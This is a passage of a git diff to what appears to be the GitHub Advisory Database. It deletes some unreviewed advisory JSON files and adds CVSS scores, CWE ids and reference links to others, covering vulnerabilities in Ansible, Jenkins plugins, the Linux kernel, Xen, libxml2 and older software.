- "github_reviewed_at": null, - "nvd_published_at": "2018-01-24T23:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-wpp8-x44c-v39q/GHSA-wpp8-x44c-v39q.json b/advisories/unreviewed/2022/05/GHSA-wpp8-x44c-v39q/GHSA-wpp8-x44c-v39q.json index 94e6cfaec6dc6..14b13374a1eef 100644 --- a/advisories/unreviewed/2022/05/GHSA-wpp8-x44c-v39q/GHSA-wpp8-x44c-v39q.json +++ b/advisories/unreviewed/2022/05/GHSA-wpp8-x44c-v39q/GHSA-wpp8-x44c-v39q.json @@ -49,7 +49,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-862" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-wqq5-c89p-3wc3/GHSA-wqq5-c89p-3wc3.json b/advisories/unreviewed/2022/05/GHSA-wqq5-c89p-3wc3/GHSA-wqq5-c89p-3wc3.json deleted file mode 100644 index b9a9070157235..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-wqq5-c89p-3wc3/GHSA-wqq5-c89p-3wc3.json +++ /dev/null @@ -1,39 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-wqq5-c89p-3wc3", - "modified": "2022-05-17T19:57:30Z", - "published": "2022-05-17T19:57:30Z", - "aliases": [ - "CVE-2014-4966" - ], - "details": "Ansible before 1.6.7 does not prevent inventory data with "{{" and "lookup" substrings, and does not prevent remote data with "{{" substrings, which allows remote attackers to execute arbitrary code via (1) crafted lookup('pipe') calls or (2) crafted Jinja2 data.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-4966" - }, - { - "type": "WEB", - "url": "https://github.com/ansible/ansible/commit/62a1295a3e08cb6c3e9f1b2a1e6e5dcaeab32527" - }, - { - "type": "WEB", - "url": "http://www.ocert.org/advisories/ocert-2014-004.html" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": null, - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2020-02-18T15:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-wrr5-p265-7252/GHSA-wrr5-p265-7252.json b/advisories/unreviewed/2022/05/GHSA-wrr5-p265-7252/GHSA-wrr5-p265-7252.json deleted file mode 100644 index 72027827c04c1..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-wrr5-p265-7252/GHSA-wrr5-p265-7252.json +++ /dev/null @@ -1,46 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-wrr5-p265-7252", - "modified": "2023-10-25T18:31:21Z", - "published": "2022-05-24T22:00:03Z", - "aliases": [ - "CVE-2019-10325" - ], - "details": "A cross-site scripting vulnerability in Jenkins Warnings NG Plugin 5.0.0 and earlier allowed attacker with Job/Configure permission to inject arbitrary JavaScript in build overview pages.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10325" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-05-31/#SECURITY-1373" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2019/05/31/2" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/108540" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-79" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-05-31T15:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-wvg9-27w3-xhh7/GHSA-wvg9-27w3-xhh7.json b/advisories/unreviewed/2022/05/GHSA-wvg9-27w3-xhh7/GHSA-wvg9-27w3-xhh7.json index 4ab4baca2cd02..cbcce8c19d37a 100644 --- a/advisories/unreviewed/2022/05/GHSA-wvg9-27w3-xhh7/GHSA-wvg9-27w3-xhh7.json +++ b/advisories/unreviewed/2022/05/GHSA-wvg9-27w3-xhh7/GHSA-wvg9-27w3-xhh7.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-wvg9-27w3-xhh7", - "modified": "2022-05-24T17:17:10Z", + "modified": "2024-02-01T03:30:23Z", "published": "2022-05-24T17:17:10Z", "aliases": [ "CVE-2020-12659" ], "details": "An issue was discovered in the Linux kernel before 5.6.7. xdp_umem_reg in net/xdp/xdp_umem.c has an out-of-bounds write (by a user with the CAP_NET_ADMIN capability) because of a lack of headroom validation.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -57,7 +60,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-787" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-wvr4-w6cw-4px8/GHSA-wvr4-w6cw-4px8.json b/advisories/unreviewed/2022/05/GHSA-wvr4-w6cw-4px8/GHSA-wvr4-w6cw-4px8.json deleted file mode 100644 index 91bfa3daa56d0..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-wvr4-w6cw-4px8/GHSA-wvr4-w6cw-4px8.json +++ /dev/null @@ -1,35 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-wvr4-w6cw-4px8", - "modified": "2022-05-24T16:59:48Z", - "published": "2022-05-24T16:59:48Z", - "aliases": [ - "CVE-2019-15929" - ], - "details": "In Craft CMS through 3.1.7, the elevated session password prompt was not being rate limited like normal login forms, leading to the possibility of a brute force attempt on them.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-15929" - }, - { - "type": "WEB", - "url": "https://github.com/craftcms/cms/blob/develop/CHANGELOG-v3.md#317---2019-01-31" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": null, - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-10-24T16:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-wwrr-4jp4-58wg/GHSA-wwrr-4jp4-58wg.json b/advisories/unreviewed/2022/05/GHSA-wwrr-4jp4-58wg/GHSA-wwrr-4jp4-58wg.json deleted file mode 100644 index 406a1737e25d3..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-wwrr-4jp4-58wg/GHSA-wwrr-4jp4-58wg.json +++ /dev/null @@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-wwrr-4jp4-58wg", - "modified": "2023-10-25T18:31:32Z", - "published": "2022-05-24T17:03:48Z", - "aliases": [ - "CVE-2019-16569" - ], - "details": "A cross-site request forgery vulnerability in Jenkins Mantis Plugin 0.26 and earlier allows attackers to connect to an attacker-specified web server using attacker-specified credentials.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-16569" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-12-17/#SECURITY-1603" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2019/12/17/1" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-352" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-12-17T15:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-www7-pq67-9w24/GHSA-www7-pq67-9w24.json b/advisories/unreviewed/2022/05/GHSA-www7-pq67-9w24/GHSA-www7-pq67-9w24.json index 4e1e43e3c56b1..2096fdfc15e1e 100644 --- a/advisories/unreviewed/2022/05/GHSA-www7-pq67-9w24/GHSA-www7-pq67-9w24.json +++ b/advisories/unreviewed/2022/05/GHSA-www7-pq67-9w24/GHSA-www7-pq67-9w24.json @@ -22,94 +22,186 @@ "type": "WEB", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/39472" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/54a42d4b01968df1117cea77fc53d6beb931c0e05936ad02af93e9ac%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/54a42d4b01968df1117cea77fc53d6beb931c0e05936ad02af93e9ac@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/5df9bfb86a3b054bb985a45ff9250b0332c9ecc181eec232489e7f79%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5df9bfb86a3b054bb985a45ff9250b0332c9ecc181eec232489e7f79@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/8d63cb8e9100f28a99429b4328e4e7cebce861d5772ac9863ba2ae6f%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/8d63cb8e9100f28a99429b4328e4e7cebce861d5772ac9863ba2ae6f@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/f7f95ac1cd9895db2714fa3ebaa0b94d0c6df360f742a40951384a53%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f7f95ac1cd9895db2714fa3ebaa0b94d0c6df360f742a40951384a53@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/r0276683d8e1e07153fc8642618830ac0ade85b9ae0dc7b07f63bb8fc%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0276683d8e1e07153fc8642618830ac0ade85b9ae0dc7b07f63bb8fc@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/r2cb985de917e7da0848c440535f65a247754db8b2154a10089e4247b%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2cb985de917e7da0848c440535f65a247754db8b2154a10089e4247b@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/r476d175be0aaf4a17680ef98c5153b4d336eaef76fb2224cc94c463a%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r476d175be0aaf4a17680ef98c5153b4d336eaef76fb2224cc94c463a@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/r5419c9ba0951ef73a655362403d12bb8d10fab38274deb3f005816f5%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5419c9ba0951ef73a655362403d12bb8d10fab38274deb3f005816f5@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/r57608dc51b79102f3952ae06f54d5277b649c86d6533dcd6a7d201f7%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r57608dc51b79102f3952ae06f54d5277b649c86d6533dcd6a7d201f7@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/r5f9c22f9c28adbd9f00556059edc7b03a5d5bb71d4bb80257c0d34e4%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5f9c22f9c28adbd9f00556059edc7b03a5d5bb71d4bb80257c0d34e4@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/r75cbe9ea3e2114e4271bbeca7aff96117b50c1b6eb7c4772b0337c1f%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r75cbe9ea3e2114e4271bbeca7aff96117b50c1b6eb7c4772b0337c1f@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/r7dd6be4dc38148704f2edafb44a8712abaa3a2be120d6c3314d55919%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7dd6be4dc38148704f2edafb44a8712abaa3a2be120d6c3314d55919@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/r84d043c2115176958562133d96d851495d712aa49da155d81f6733be%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r84d043c2115176958562133d96d851495d712aa49da155d81f6733be@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/r8828e649175df56f1f9e3919938ac7826128525426e2748f0ab62feb%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8828e649175df56f1f9e3919938ac7826128525426e2748f0ab62feb@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/r9e8622254184645bc963a1d47c5d47f6d5a36d6f080d8d2c43b2b142%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9e8622254184645bc963a1d47c5d47f6d5a36d6f080d8d2c43b2b142@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/r9ea3538f229874c80a10af473856a81fbf5f694cd7f471cc679ba70b%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9ea3538f229874c80a10af473856a81fbf5f694cd7f471cc679ba70b@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/r9f93cf6dde308d42a9c807784e8102600d0397f5f834890708bf6920%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9f93cf6dde308d42a9c807784e8102600d0397f5f834890708bf6920@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/rad01d817195e6cc871cb1d73b207ca326379a20a6e7f30febaf56d24%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rad01d817195e6cc871cb1d73b207ca326379a20a6e7f30febaf56d24@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/rb9c9f42dafa25d2f669dac2a536a03f2575bc5ec1be6f480618aee10%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb9c9f42dafa25d2f669dac2a536a03f2575bc5ec1be6f480618aee10@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/rc4c53a0d57b2771ecd4b965010580db355e38137c8711311ee1073a8%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc4c53a0d57b2771ecd4b965010580db355e38137c8711311ee1073a8@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/rdca61ae990660bacb682295f2a09d34612b7bb5f457577fe17f4d064%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdca61ae990660bacb682295f2a09d34612b7bb5f457577fe17f4d064@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/rf6449464fd8b7437704c55f88361b66f12d5b5f90bcce66af4be4ba9%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf6449464fd8b7437704c55f88361b66f12d5b5f90bcce66af4be4ba9@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/rfbaf647d52c1cb843e726a0933f156366a806cead84fbd430951591b%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfbaf647d52c1cb843e726a0933f156366a806cead84fbd430951591b@%3Ccvs.httpd.apache.org%3E" diff --git a/advisories/unreviewed/2022/05/GHSA-wx39-gwc4-8cjf/GHSA-wx39-gwc4-8cjf.json b/advisories/unreviewed/2022/05/GHSA-wx39-gwc4-8cjf/GHSA-wx39-gwc4-8cjf.json index 58c4e567b8374..70c605c9efbde 100644 --- a/advisories/unreviewed/2022/05/GHSA-wx39-gwc4-8cjf/GHSA-wx39-gwc4-8cjf.json +++ b/advisories/unreviewed/2022/05/GHSA-wx39-gwc4-8cjf/GHSA-wx39-gwc4-8cjf.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-wx39-gwc4-8cjf", - "modified": "2022-05-01T02:03:09Z", + "modified": "2024-02-08T18:30:37Z", "published": "2022-05-01T02:03:09Z", "aliases": [ "CVE-2005-1891" ], "details": "The GIF parser in ateimg32.dll in AOL Instant Messenger (AIM) 5.9.3797 and earlier allows remote attackers to cause a denial of service (crash) via a malformed buddy icon that causes an integer underflow in a loop counter variable.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -37,7 +40,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-191" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-wxj2-qc9p-65r3/GHSA-wxj2-qc9p-65r3.json b/advisories/unreviewed/2022/05/GHSA-wxj2-qc9p-65r3/GHSA-wxj2-qc9p-65r3.json deleted file mode 100644 index ccc0c4f6b6a20..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-wxj2-qc9p-65r3/GHSA-wxj2-qc9p-65r3.json +++ /dev/null @@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-wxj2-qc9p-65r3", - "modified": "2022-05-13T01:31:34Z", - "published": "2022-05-13T01:31:34Z", - "aliases": [ - "CVE-2019-1003026" - ], - "details": "A server-side request forgery vulnerability exists in Jenkins Mattermost Notification Plugin 2.6.2 and earlier in MattermostNotifier.java that allows attackers with Overall/Read permission to have Jenkins connect to an attacker-specified Mattermost server and room and send a message.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003026" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-02-19/#SECURITY-985" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/107295" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-918" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-02-20T21:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-x35p-q7vp-559r/GHSA-x35p-q7vp-559r.json b/advisories/unreviewed/2022/05/GHSA-x35p-q7vp-559r/GHSA-x35p-q7vp-559r.json index 3795bcbacb929..461078cb9d691 100644 --- a/advisories/unreviewed/2022/05/GHSA-x35p-q7vp-559r/GHSA-x35p-q7vp-559r.json +++ b/advisories/unreviewed/2022/05/GHSA-x35p-q7vp-559r/GHSA-x35p-q7vp-559r.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-x35p-q7vp-559r", - "modified": "2022-05-02T06:09:53Z", + "modified": "2024-02-03T03:30:26Z", "published": "2022-05-02T06:09:53Z", "aliases": [ "CVE-2010-0050" ], "details": "Use-after-free vulnerability in WebKit in Apple Safari before 4.0.5 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an HTML document with improperly nested tags.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -97,7 +100,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-416" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-x654-4wjh-74q6/GHSA-x654-4wjh-74q6.json b/advisories/unreviewed/2022/05/GHSA-x654-4wjh-74q6/GHSA-x654-4wjh-74q6.json deleted file mode 100644 index 1a1726ef68f56..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-x654-4wjh-74q6/GHSA-x654-4wjh-74q6.json +++ /dev/null @@ -1,46 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-x654-4wjh-74q6", - "modified": "2022-05-13T01:36:51Z", - "published": "2022-05-13T01:36:51Z", - "aliases": [ - "CVE-2017-2648" - ], - "details": "It was found that jenkins-ssh-slaves-plugin before version 1.15 did not perform host key verification, thereby enabling Man-in-the-Middle attacks.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-2648" - }, - { - "type": "WEB", - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2017-2648" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2017-03-20/" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/96985" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-295" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2018-07-27T20:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-x7qf-qh3r-mx22/GHSA-x7qf-qh3r-mx22.json b/advisories/unreviewed/2022/05/GHSA-x7qf-qh3r-mx22/GHSA-x7qf-qh3r-mx22.json deleted file mode 100644 index 18d696400248a..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-x7qf-qh3r-mx22/GHSA-x7qf-qh3r-mx22.json +++ /dev/null @@ -1,38 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-x7qf-qh3r-mx22", - "modified": "2022-05-14T03:46:09Z", - "published": "2022-05-14T03:46:09Z", - "aliases": [ - "CVE-2018-1000010" - ], - "details": "Jenkins DRY Plugin 2.49 and earlier processes XML external entities in files it parses as part of the build process, allowing attackers with user permissions in Jenkins to extract secrets from the Jenkins master, perform server-side request forgery, or denial-of-service attacks.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000010" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2018-01-22/" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-611" - ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2018-01-23T14:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-x89c-76jf-xx4h/GHSA-x89c-76jf-xx4h.json b/advisories/unreviewed/2022/05/GHSA-x89c-76jf-xx4h/GHSA-x89c-76jf-xx4h.json index 516714c4370c3..582a33ff9ad9c 100644 --- a/advisories/unreviewed/2022/05/GHSA-x89c-76jf-xx4h/GHSA-x89c-76jf-xx4h.json +++ b/advisories/unreviewed/2022/05/GHSA-x89c-76jf-xx4h/GHSA-x89c-76jf-xx4h.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-x89c-76jf-xx4h", - "modified": "2022-05-24T19:21:18Z", + "modified": "2024-02-04T09:30:31Z", "published": "2022-05-24T19:21:18Z", "aliases": [ "CVE-2021-28706" ], "details": "guests may exceed their designated memory limit When a guest is permitted to have close to 16TiB of memory, it may be able to issue hypercalls to increase its memory allocation beyond the administrator established limit. This is a result of a calculation done with 32-bit precision, which may overflow. It would then only be the overflowed (and hence small) number which gets compared against the established upper bound.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H" + } ], "affected": [ @@ -18,6 +21,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-28706" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/I7ZGWVVRI4XY2XSTBI3XEMWBXPDVX6OT/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PXUI4VMD52CH3T7YXAG3J2JW7ZNN3SXF/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I7ZGWVVRI4XY2XSTBI3XEMWBXPDVX6OT/" @@ -26,6 +37,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PXUI4VMD52CH3T7YXAG3J2JW7ZNN3SXF/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-07" + }, { "type": "WEB", "url": "https://www.debian.org/security/2021/dsa-5017" diff --git a/advisories/unreviewed/2022/05/GHSA-x9c5-c5mj-wjjx/GHSA-x9c5-c5mj-wjjx.json b/advisories/unreviewed/2022/05/GHSA-x9c5-c5mj-wjjx/GHSA-x9c5-c5mj-wjjx.json index bd2b64a4ebb62..66a01859d486f 100644 --- a/advisories/unreviewed/2022/05/GHSA-x9c5-c5mj-wjjx/GHSA-x9c5-c5mj-wjjx.json +++ b/advisories/unreviewed/2022/05/GHSA-x9c5-c5mj-wjjx/GHSA-x9c5-c5mj-wjjx.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-x9c5-c5mj-wjjx", - "modified": "2022-05-01T23:58:24Z", + "modified": "2024-02-02T15:30:27Z", "published": "2022-05-01T23:58:24Z", "aliases": [ "CVE-2008-3281" ], "details": "libxml2 2.6.32 and earlier does not properly detect recursion during entity expansion in an attribute value, which allows context-dependent attackers to cause a denial of service (memory and CPU consumption) via a crafted XML document.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -189,7 +192,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-776" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-xc62-vv2q-247g/GHSA-xc62-vv2q-247g.json b/advisories/unreviewed/2022/05/GHSA-xc62-vv2q-247g/GHSA-xc62-vv2q-247g.json index 4e6db0531b917..7e73ff0bbe6e9 100644 --- a/advisories/unreviewed/2022/05/GHSA-xc62-vv2q-247g/GHSA-xc62-vv2q-247g.json +++ b/advisories/unreviewed/2022/05/GHSA-xc62-vv2q-247g/GHSA-xc62-vv2q-247g.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-xc62-vv2q-247g", - "modified": "2022-05-01T23:58:54Z", + "modified": "2024-02-08T15:30:26Z", "published": "2022-05-01T23:58:54Z", "aliases": [ "CVE-2008-3324" ], "details": "The PartyGaming PartyPoker client program 121/120 does not properly verify the authenticity of updates, which allows remote man-in-the-middle attackers to execute arbitrary code via a Trojan horse update.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -37,6 +40,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-494", "CWE-94" ], "severity": "HIGH", diff --git a/advisories/unreviewed/2022/05/GHSA-xf9v-wfx4-53c3/GHSA-xf9v-wfx4-53c3.json b/advisories/unreviewed/2022/05/GHSA-xf9v-wfx4-53c3/GHSA-xf9v-wfx4-53c3.json index 0b52a6ad247a4..8c9e66ee28a49 100644 --- a/advisories/unreviewed/2022/05/GHSA-xf9v-wfx4-53c3/GHSA-xf9v-wfx4-53c3.json +++ b/advisories/unreviewed/2022/05/GHSA-xf9v-wfx4-53c3/GHSA-xf9v-wfx4-53c3.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-xf9v-wfx4-53c3", - "modified": "2022-05-01T18:06:32Z", + "modified": "2024-02-02T03:30:31Z", "published": "2022-05-01T18:06:32Z", "aliases": [ "CVE-2007-2723" ], "details": "Media Player Classic 6.4.9.0 allows user-assisted remote attackers to cause a denial of service (web browser crash) via an \"empty\" .MPA file, which triggers a divide-by-zero error.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -41,7 +44,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-369" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-xgc2-q928-27wv/GHSA-xgc2-q928-27wv.json b/advisories/unreviewed/2022/05/GHSA-xgc2-q928-27wv/GHSA-xgc2-q928-27wv.json deleted file mode 100644 index 6366dbaf97812..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-xgc2-q928-27wv/GHSA-xgc2-q928-27wv.json +++ /dev/null @@ -1,67 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": 